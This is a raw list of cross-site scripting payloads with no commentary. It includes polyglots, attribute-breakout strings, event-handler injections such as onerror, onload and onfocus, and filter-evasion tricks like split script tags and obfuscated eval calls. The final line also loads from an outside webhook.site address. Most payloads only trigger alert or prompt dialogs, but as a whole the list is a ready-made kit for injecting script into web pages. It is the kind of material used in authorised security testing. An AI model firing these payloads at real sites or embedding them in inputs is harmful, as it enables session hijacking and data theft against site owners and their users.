"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
ava/script:"/*`/*\`/*"/*\"/*-/*);/*<!--></script></style></textarea></template></noscript></noembed></select>--><<svg/autofocus/onload=/*confirm(/shahmibro/.source)/*/c=confirm,c(69)//
"-top[%27al\x65rt%27](%27sailay%27)-"
"-alert``-"
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
< img//////src=https://webhook.site/bc5f9f62-9936-46c9-8649-e745d8f62562 oNIY=1 style="display:none;" oNerror=alert(1)//